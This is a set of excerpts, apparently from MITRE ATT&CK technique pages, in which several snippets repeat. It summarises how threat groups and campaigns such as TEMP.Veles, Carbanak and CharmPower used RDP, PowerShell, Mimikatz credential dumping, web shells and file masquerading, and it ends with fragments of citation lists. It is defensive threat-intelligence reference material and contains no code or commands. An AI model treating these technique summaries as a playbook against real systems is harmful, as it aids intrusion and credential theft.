…establish RDP connections, including ports 28035, 32467, 41578, and 46892. [22] C0032 C0032 During the C0032 campaign, TEMP.Veles utilized RDP throughout an operation. [23] S0030 Carbanak Carbanak enables concurrent Remote Desktop Protocol (RDP) sessions. [24] G0114 Chimera Chime…

…ed PowerShell to extract an encoded payload from within an .LNK file. [55] [56] C0032 C0032 During the C0032 campaign, TEMP.Veles used PowerShell to perform timestomping. [57] S0674 CharmPower CharmPower can use PowerShell for payload execution and C2 communication. [58] G0114 Ch…

…s: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020. Ilascu, I. (2020, December 14). Hacking group’s new malware abuses Google and Facebook services. Retrieved December 28, 2020. Cristian Souza, Eduardo Ovalle, Ashley …

…establish RDP connections, including ports 28035, 32467, 41578, and 46892. [18] C0032 C0032 During the C0032 campaign, TEMP.Veles utilized RDP throughout an operation. [19] S0030 Carbanak Carbanak enables concurrent Remote Desktop Protocol (RDP) sessions. [20] G0114 Chimera Chime…

…ed various tools (such as Mimikatz and WCE) to perform credential dumping. [25] C0032 C0032 During the C0032 campaign, TEMP.Veles used Mimikatz and a custom tool, SecHack, to harvest credentials. [26] G0003 Cleaver Cleaver has been known to dump credentials using Mimikatz and Win…

…ed PowerShell to extract an encoded payload from within an .LNK file. [49] [50] C0032 C0032 During the C0032 campaign, TEMP.Veles used PowerShell to perform timestomping. [51] S0674 CharmPower CharmPower can use PowerShell for payload execution and C2 communication. [52] G0114 Ch…

… For C0018 , the threat actors renamed a Sliver payload to vmware_kb.exe . [38] C0032 C0032 During the C0032 campaign, TEMP.Veles renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files. [39] S0274 Calisto Calisto 's insta…

…ed various tools (such as Mimikatz and WCE) to perform credential dumping. [25] C0032 C0032 During the C0032 campaign, TEMP.Veles used Mimikatz and a custom tool, SecHack, to harvest credentials. [26] G0003 Cleaver Cleaver has been known to dump credentials using Mimikatz and Win…

…ed JScript web shells through the creation of malicious ViewState objects. [19] C0032 C0032 During the C0032 campaign, TEMP.Veles planted Web shells on Outlook Exchange servers. [20] S0020 China Chopper China Chopper 's server component is a Web Shell payload. [2] G1012 CURIUM CU…

…etrieved January 5, 2023. Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020. Miller-Osborn, J. and Grunzweig, J.. (2017, March 30). Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations. Retrieve…

…uly 5, 2023. Hunt & Hackett Research Team. (2024, January 5). Turkish espionage campaigns in the Netherlands. Retrieved November 20, 2024. Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. Cro…

…ra, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020. Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022. CERT-EE. (2021, January 27). Gamaredon Infect…

…27, 2021. Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018. Joey Chen, Cisco Talos. (2025, February 27). Lotus Blossom espionage group targets multiple industries with different versions of…

…er 7). Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns. Retrieved June 13, 2024. DiMaggio, J. (2016, May 17). Indian organizations targeted in Suckfly attacks. Retrieved August 3, 2016. Dell SecureWorks Counter Threat Unit Threat Intelligence. (…

…dhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022. Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019. Raggi, M. Schwarz, D.. (2019, August 1). LookBack Malw…